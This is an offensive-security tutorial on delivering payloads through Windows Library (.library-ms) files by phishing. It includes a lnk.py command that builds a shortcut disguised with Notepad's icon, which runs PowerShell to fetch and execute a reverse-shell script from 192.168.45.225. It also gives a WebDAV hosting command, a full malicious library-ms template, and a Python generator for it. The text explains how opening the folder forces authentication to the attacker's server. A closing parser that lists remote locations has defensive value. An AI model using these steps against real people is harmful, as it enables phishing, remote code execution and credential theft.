Windows Library Files

Theory

Windows Library files (.library-ms) are XML documents describing a virtual container for user content. A library can point to one or more local or remote storage locations, and Windows Explorer presents them to the user as a single folder.

We can send this file by e-mail and use social engineering to get the recipient to open the container (it appears as a normal folder in Windows Explorer) and then double-click our hosted payload to execute it.

Delivering the payload through a Windows Library file, rather than sending a direct link to the remote server hosting it, may help evade IDS/IPS and anti-spam solutions that inspect links in the message body.

When the searchConnectorDescription section of the .library-ms file points to a remote location, Explorer connects to that location as soon as the container folder is opened (through the WebClient service for WebDAV URLs) and will authenticate to the remote server if it is challenged. The file can therefore also be used to force authentication from the victim without any further interaction.

Practice

In this scenario, we'll create a .library-ms file pointing to our WebDAV server, which hosts a malicious .lnk file. The user will need to open both the container and the shortcut to execute our payload. Explorer reaches WebDAV locations through the WebClient service, so this targets workstations where that service is available (it is not installed by default on Windows Server).

First, let's create our malicious .lnk shortcut using lnk.py (a Python 2 script). The first positional argument is the output file and the second the target executable; -a supplies the target's arguments and -i the icon shown to the user (Notepad's here, so the shortcut looks harmless).

# -a : Arguments
# -i : Icon location
python2.7 lnk.py evil.lnk 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-c "iex(iwr http://192.168.45.225/rev.ps1 -UseBasicParsing)"' -i 'C:\Windows\System32\Notepad.exe'

Then, start a WebDAV server to host our payload

# Install with: sudo apt install python3-wsgidav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

We can now create our evil.library-ms file with the following content. The <url> element is the location Explorer will open when the container is browsed; replace ATTACKING_IP with the address of the WebDAV server (192.168.45.225 in the lnk.py command above).

evil.library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://ATTACKING_IP</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

If you created this file on Linux, we may need to convert its line endings to the Windows CRLF format (unix2dos changes only the line endings; the file stays UTF-8) as follows

unix2dos evil.library-ms
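As an added example (not part of the original page), the following Python 3 script generates the same .library-ms for a chosen WebDAV URL, writes it with the CRLF line endings the unix2dos step produces, and also parses any .library-ms to list the remote locations it would make Explorer open, which is the check a defender would run on e-mailed attachments. The address 192.0.2.10 and the local-path sample are constructed placeholders.

```python
# Added example: build a .library-ms with a remote search connector, and
# inspect any .library-ms for remote locations (the check a mail gateway or
# triage script would apply). Not from the original page; 192.0.2.10 is a
# constructed TEST-NET placeholder.
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import escape

NS = "http://schemas.microsoft.com/windows/2009/library"

# Same structure as the evil.library-ms file above; only <url> varies.
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def is_remote(location: str) -> bool:
    """True for locations Explorer fetches over the network:
    http(s) WebDAV URLs and UNC paths (\\\\host\\share)."""
    scheme = urlparse(location).scheme.lower()
    return scheme in ("http", "https") or location.startswith("\\\\")


def build_library_ms(url: str) -> str:
    """Return the library XML (LF line endings) pointing at a WebDAV URL.
    The URL is XML-escaped so query strings with '&' stay well-formed."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        raise ValueError("expected an http(s) WebDAV URL, got %r" % url)
    return TEMPLATE.format(ns=NS, url=escape(url))


def to_windows_bytes(text: str) -> bytes:
    """UTF-8 with CRLF line endings, i.e. what unix2dos produces."""
    return text.replace("\r\n", "\n").replace("\n", "\r\n").encode("utf-8")


def remote_locations(data: bytes) -> list:
    """Return every <simpleLocation><url> that points off-host.
    A benign user library lists local paths or knownfolder: references,
    so any remote URL in an e-mailed .library-ms is worth flagging."""
    root = ET.fromstring(data)
    found = []
    for loc in root.iter("{%s}simpleLocation" % NS):
        u = loc.find("{%s}url" % NS)
        if u is not None and u.text and is_remote(u.text.strip()):
            found.append(u.text.strip())
    return found


# Constructed benign library for comparison: only a local folder.
BENIGN_LOCAL = to_windows_bytes(
    TEMPLATE.format(ns=NS, url=r"C:\Users\Public\Documents"))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.10"
    data = to_windows_bytes(build_library_ms(target))
    with open("evil.library-ms", "wb") as f:
        f.write(data)
    print("remote locations in generated file:", remote_locations(data))
    print("remote locations in benign sample:", remote_locations(BENIGN_LOCAL))
```

Run it with the WebDAV server address as the only argument to write evil.library-ms in the current directory; feed any received .library-ms to remote_locations() to see which hosts Explorer would contact on open.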

We can now send the evil.library-ms file to the target!
